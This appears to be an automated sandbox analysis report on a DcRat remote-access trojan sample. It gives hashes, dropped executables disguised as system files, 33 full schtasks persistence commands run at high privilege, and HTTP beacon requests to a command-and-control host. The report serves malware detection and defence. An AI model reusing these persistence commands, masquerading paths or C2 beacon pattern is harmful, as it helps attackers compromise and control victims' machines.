Overview
overview
10Static
static
10c39e5e5773...fb.exe
windows7-x64
7c39e5e5773...fb.exe
windows10-2004-x64
7c3a61d282c...2f.exe
windows7-x64
7c3a61d282c...2f.exe
windows10-2004-x64
7c3aaa8d067...d1.exe
windows7-x64
10c3aaa8d067...d1.exe
windows10-2004-x64
10c40612db16...6d.exe
windows7-x64
10c40612db16...6d.exe
windows10-2004-x64
10c45000d072...99.exe
windows7-x64
10c45000d072...99.exe
windows10-2004-x64
10c4639b8ab9...97.exe
windows7-x64
10c4639b8ab9...97.exe
windows10-2004-x64
10c47cd91636...6d.exe
windows7-x64
1c47cd91636...6d.exe
windows10-2004-x64
1c486ed6acb...df.exe
windows7-x64
7c486ed6acb...df.exe
windows10-2004-x64
7c4b4c8152f...dc.exe
windows7-x64
10c4b4c8152f...dc.exe
windows10-2004-x64
10c4c197e502...e0.exe
windows7-x64
10c4c197e502...e0.exe
windows10-2004-x64
10c4ca622404...18.exe
windows7-x64
10c4ca622404...18.exe
windows10-2004-x64
10c50b533887...50.exe
windows7-x64
10c50b533887...50.exe
windows10-2004-x64
10c50b94cf52...6f.exe
windows7-x64
10c50b94cf52...6f.exe
windows10-2004-x64
10c520bfebf2...a2.exe
windows7-x64
8c520bfebf2...a2.exe
windows10-2004-x64
10c53059381a...48.exe
windows7-x64
10c53059381a...48.exe
windows10-2004-x64
10c59549cfc2...b8.exe
windows7-x64
1c59549cfc2...b8.exe
windows10-2004-x64
1Analysis
-
max time kernel
22s -
max time network
25s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22/03/2025, 19:52 UTC
Static task
static1
Behavioral task
behavioral1
Sample
c39e5e577360a09a924844399e1953fb.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
c39e5e577360a09a924844399e1953fb.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral3
Sample
c3a61d282c9a5249427d1c50d79414b05441de100982cf90354b0466ec013e2f.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
c3a61d282c9a5249427d1c50d79414b05441de100982cf90354b0466ec013e2f.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral5
Sample
c3aaa8d0678c59cfe55a289d29c5b3d1.exe
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
c3aaa8d0678c59cfe55a289d29c5b3d1.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral7
Sample
c40612db16415a3ee8c44a6f5157ef0e20ae02daa0d2c9c0cb99eac72887466d.exe
Resource
win7-20241023-en
Behavioral task
behavioral8
Sample
c40612db16415a3ee8c44a6f5157ef0e20ae02daa0d2c9c0cb99eac72887466d.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral9
Sample
c45000d07293154a655ba52ffb7bab99.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
c45000d07293154a655ba52ffb7bab99.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral11
Sample
c4639b8ab98b523a89ed2bda24ad0398b38514d4a5737e6450912caaca523297.exe
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
c4639b8ab98b523a89ed2bda24ad0398b38514d4a5737e6450912caaca523297.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral13
Sample
c47cd916369fb96f0624e8c8a549946d.exe
Resource
win7-20241010-en
Behavioral task
behavioral14
Sample
c47cd916369fb96f0624e8c8a549946d.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral15
Sample
c486ed6acb598d864bd441b40bbb31df.exe
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
c486ed6acb598d864bd441b40bbb31df.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral17
Sample
c4b4c8152f8279bd2440201d33beb75aa3078ebc76c0622bb4778375afb08adc.exe
Resource
win7-20240729-en
Behavioral task
behavioral18
Sample
c4b4c8152f8279bd2440201d33beb75aa3078ebc76c0622bb4778375afb08adc.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral19
Sample
c4c197e50214b25100e10fb00b2ac6e0.exe
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
c4c197e50214b25100e10fb00b2ac6e0.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral21
Sample
c4ca622404b5b4763e20a205a41db518.exe
Resource
win7-20241023-en
Behavioral task
behavioral22
Sample
c4ca622404b5b4763e20a205a41db518.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral23
Sample
c50b533887d2992f66c414bd95339750.exe
Resource
win7-20240903-en
Behavioral task
behavioral24
Sample
c50b533887d2992f66c414bd95339750.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral25
Sample
c50b94cf52f9ee1ec307059e727995fc0e98c8003570e368508d911debf3cd6f.exe
Resource
win7-20240903-en
Behavioral task
behavioral26
Sample
c50b94cf52f9ee1ec307059e727995fc0e98c8003570e368508d911debf3cd6f.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral27
Sample
c520bfebf2b7ca231d0b6bb731bc67c608dad8f84583daab3f8d0783fa3ae7a2.exe
Resource
win7-20241010-en
Behavioral task
behavioral28
Sample
c520bfebf2b7ca231d0b6bb731bc67c608dad8f84583daab3f8d0783fa3ae7a2.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral29
Sample
c53059381a17db7f48cf6871b7869c48.exe
Resource
win7-20240903-en
Behavioral task
behavioral30
Sample
c53059381a17db7f48cf6871b7869c48.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral31
Sample
c59549cfc2b2687a8a799ef4b5c772e60d089fff5ccd837b46f07b019eb359b8.exe
Resource
win7-20241023-en
Behavioral task
behavioral32
Sample
c59549cfc2b2687a8a799ef4b5c772e60d089fff5ccd837b46f07b019eb359b8.exe
Resource
win10v2004-20250314-en
General
-
Target
c45000d07293154a655ba52ffb7bab99.exe
-
Size
849KB
-
MD5
c45000d07293154a655ba52ffb7bab99
-
SHA1
4b4fbc2c00cf6c6c6fcea58074213c4f0606b80a
-
SHA256
f639fc426671cba387b08b8c14743bccfd9d13866982573a1ed2e150967c17ac
-
SHA512
2805351e0080a62061efb9bc7e3d953221df1180edfcf1142b59302a0afbcf3332a8855deaa9f147ebb11789a3cdbadf6073306000d03698537813bf579df674
-
SSDEEP
12288:I6NE5ig5Fttrh5PxjUm5SvDdLILaBFkjKuAMx6A5gtbGk84Ca04jtiPBgGKYTx:I6N297PxbsKtC5AHgk
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Process spawned unexpected child process 33 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2780 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2900 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2976 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2756 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2912 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1808 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1860 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2796 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2620 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2680 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2340 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1880 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1472 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2952 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1828 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3036 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2832 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2856 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3060 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1660 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2860 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3052 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3056 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2020 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1748 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1752 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 572 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2328 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2204 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2568 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2324 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 836 2464 schtasks.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2604 2464 schtasks.exe 31 -
resource yara_rule behavioral9/memory/2532-1-0x00000000002A0000-0x000000000037A000-memory.dmp dcrat behavioral9/files/0x0005000000019616-17.dat dcrat behavioral9/files/0x0011000000015ceb-79.dat dcrat behavioral9/files/0x0007000000019610-90.dat dcrat behavioral9/memory/2800-172-0x0000000000890000-0x000000000096A000-memory.dmp dcrat -
Executes dropped EXE 1 IoCs
pid Process 2800 OSPPSVC.exe -
Drops file in Program Files directory 25 IoCs
description ioc Process File created C:\Program Files\Windows NT\Accessories\it-IT\audiodg.exe c45000d07293154a655ba52ffb7bab99.exe File created C:\Program Files\Windows NT\Accessories\it-IT\42af1c969fbb7b c45000d07293154a655ba52ffb7bab99.exe File created C:\Program Files\Reference Assemblies\Microsoft\System.exe c45000d07293154a655ba52ffb7bab99.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\lsm.exe c45000d07293154a655ba52ffb7bab99.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\27d1bcfc3c54e0 c45000d07293154a655ba52ffb7bab99.exe File opened for modification C:\Program Files (x86)\Google\CrashReports\explorer.exe c45000d07293154a655ba52ffb7bab99.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\RCXE7AB.tmp c45000d07293154a655ba52ffb7bab99.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\System.exe c45000d07293154a655ba52ffb7bab99.exe File opened for modification C:\Program Files\Windows NT\Accessories\it-IT\RCXEEA3.tmp c45000d07293154a655ba52ffb7bab99.exe File opened for modification C:\Program Files\Windows NT\Accessories\it-IT\RCXEEA4.tmp c45000d07293154a655ba52ffb7bab99.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\RCXE130.tmp c45000d07293154a655ba52ffb7bab99.exe File created C:\Program Files (x86)\Windows Photo Viewer\lsm.exe c45000d07293154a655ba52ffb7bab99.exe File opened for modification C:\Program Files (x86)\Google\CrashReports\RCXE5A7.tmp c45000d07293154a655ba52ffb7bab99.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\RCXF58C.tmp c45000d07293154a655ba52ffb7bab99.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\System.exe c45000d07293154a655ba52ffb7bab99.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\System.exe c45000d07293154a655ba52ffb7bab99.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\RCXE896.tmp c45000d07293154a655ba52ffb7bab99.exe File opened for modification C:\Program Files\Windows NT\Accessories\it-IT\audiodg.exe c45000d07293154a655ba52ffb7bab99.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\RCXF58D.tmp c45000d07293154a655ba52ffb7bab99.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\RCXE12F.tmp c45000d07293154a655ba52ffb7bab99.exe File opened for modification C:\Program Files (x86)\Google\CrashReports\RCXE539.tmp c45000d07293154a655ba52ffb7bab99.exe File created C:\Program Files (x86)\Windows Photo Viewer\101b941d020240 c45000d07293154a655ba52ffb7bab99.exe File created C:\Program Files (x86)\Google\CrashReports\explorer.exe c45000d07293154a655ba52ffb7bab99.exe File created C:\Program Files (x86)\Google\CrashReports\7a0fd90576e088 c45000d07293154a655ba52ffb7bab99.exe File created C:\Program Files\Reference Assemblies\Microsoft\27d1bcfc3c54e0 c45000d07293154a655ba52ffb7bab99.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File created C:\Windows\Web\Wallpaper\OSPPSVC.exe c45000d07293154a655ba52ffb7bab99.exe File created C:\Windows\Web\Wallpaper\1610b97d3ab4a7 c45000d07293154a655ba52ffb7bab99.exe File opened for modification C:\Windows\Web\Wallpaper\RCXE334.tmp c45000d07293154a655ba52ffb7bab99.exe File opened for modification C:\Windows\Web\Wallpaper\RCXE335.tmp c45000d07293154a655ba52ffb7bab99.exe File opened for modification C:\Windows\Web\Wallpaper\OSPPSVC.exe c45000d07293154a655ba52ffb7bab99.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 33 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1880 schtasks.exe 2860 schtasks.exe 2324 schtasks.exe 2604 schtasks.exe 2976 schtasks.exe 1808 schtasks.exe 1748 schtasks.exe 2780 schtasks.exe 2756 schtasks.exe 1828 schtasks.exe 1660 schtasks.exe 3052 schtasks.exe 2912 schtasks.exe 1472 schtasks.exe 2856 schtasks.exe 3056 schtasks.exe 2204 schtasks.exe 836 schtasks.exe 2340 schtasks.exe 2832 schtasks.exe 3060 schtasks.exe 1860 schtasks.exe 3036 schtasks.exe 2328 schtasks.exe 2900 schtasks.exe 2796 schtasks.exe 2020 schtasks.exe 572 schtasks.exe 2620 schtasks.exe 2952 schtasks.exe 1752 schtasks.exe 2568 schtasks.exe 2680 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2532 c45000d07293154a655ba52ffb7bab99.exe 2800 OSPPSVC.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2532 c45000d07293154a655ba52ffb7bab99.exe Token: SeDebugPrivilege 2800 OSPPSVC.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2532 wrote to memory of 2300 2532 c45000d07293154a655ba52ffb7bab99.exe 65 PID 2532 wrote to memory of 2300 2532 c45000d07293154a655ba52ffb7bab99.exe 65 PID 2532 wrote to memory of 2300 2532 c45000d07293154a655ba52ffb7bab99.exe 65 PID 2300 wrote to memory of 1800 2300 cmd.exe 67 PID 2300 wrote to memory of 1800 2300 cmd.exe 67 PID 2300 wrote to memory of 1800 2300 cmd.exe 67 PID 2300 wrote to memory of 2800 2300 cmd.exe 68 PID 2300 wrote to memory of 2800 2300 cmd.exe 68 PID 2300 wrote to memory of 2800 2300 cmd.exe 68 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c45000d07293154a655ba52ffb7bab99.exe"C:\Users\Admin\AppData\Local\Temp\c45000d07293154a655ba52ffb7bab99.exe"1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\BP5ZSgoJ71.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:23⤵PID:1800
-
-
C:\Windows\Web\Wallpaper\OSPPSVC.exe"C:\Windows\Web\Wallpaper\OSPPSVC.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\lsm.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2780
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\lsm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2900
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\lsm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2976
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Photo Viewer\lsm.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2756
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\lsm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2912
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Photo Viewer\lsm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1808
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 6 /tr "'C:\Windows\Web\Wallpaper\OSPPSVC.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1860
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\Windows\Web\Wallpaper\OSPPSVC.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2796
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 5 /tr "'C:\Windows\Web\Wallpaper\OSPPSVC.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2620
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Google\CrashReports\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\CrashReports\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2340
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Google\CrashReports\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1880
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Program Files\Reference Assemblies\Microsoft\System.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1472
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2952
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Program Files\Reference Assemblies\Microsoft\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1828
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3036
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2832
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2856
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3060
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\MSOCache\All Users\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1660
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2860
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodga" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows NT\Accessories\it-IT\audiodg.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3052
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\it-IT\audiodg.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3056
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodga" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows NT\Accessories\it-IT\audiodg.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2020
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\Recent\wininit.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1748
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Admin\Recent\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1752
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Recent\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:572
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\services.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2328
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\MSOCache\All Users\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2204
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2568
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\System.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2324
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:836
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2604
Network
-
Remote address:8.8.8.8:53Requesta0728298.xsph.ruIN AResponsea0728298.xsph.ruIN A141.8.197.42
-
GEThttp://a0728298.xsph.ru/tobase.php?QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE&6761200d83ef06c9e2de2b0369613527=df37ef6ee3e07280dee302dbf0daffbc&bb1db653a682b528e4045fb2a995c135=AO4YGNxQ2NyITMjBTO5gDNjFWO0MWOzETNjFWO5AjN2IDM2EGOyUTZ&QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kEOSPPSVC.exeRemote address:141.8.197.42:80RequestGET /tobase.php?QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE&6761200d83ef06c9e2de2b0369613527=df37ef6ee3e07280dee302dbf0daffbc&bb1db653a682b528e4045fb2a995c135=AO4YGNxQ2NyITMjBTO5gDNjFWO0MWOzETNjFWO5AjN2IDM2EGOyUTZ&QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE HTTP/1.1
Accept: */*
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: a0728298.xsph.ru
Connection: Keep-Alive
ResponseHTTP/1.1 400 Bad Request
Date: Sat, 22 Mar 2025 19:53:47 GMT
Content-Type: text/html
Content-Length: 556
Connection: close
-
GEThttp://a0728298.xsph.ru/tobase.php?QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE&6761200d83ef06c9e2de2b0369613527=df37ef6ee3e07280dee302dbf0daffbc&bb1db653a682b528e4045fb2a995c135=AO4YGNxQ2NyITMjBTO5gDNjFWO0MWOzETNjFWO5AjN2IDM2EGOyUTZ&QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kEOSPPSVC.exeRemote address:141.8.197.42:80RequestGET /tobase.php?QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE&6761200d83ef06c9e2de2b0369613527=df37ef6ee3e07280dee302dbf0daffbc&bb1db653a682b528e4045fb2a995c135=AO4YGNxQ2NyITMjBTO5gDNjFWO0MWOzETNjFWO5AjN2IDM2EGOyUTZ&QJF8CK2OGYUt3Qnn4Nij=lpOXIkYoRfhn6l3ZEHSLhT1kE HTTP/1.1
Accept: */*
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: a0728298.xsph.ru
ResponseHTTP/1.1 400 Bad Request
Date: Sat, 22 Mar 2025 19:53:47 GMT
Content-Type: text/html
Content-Length: 556
Connection: close
-
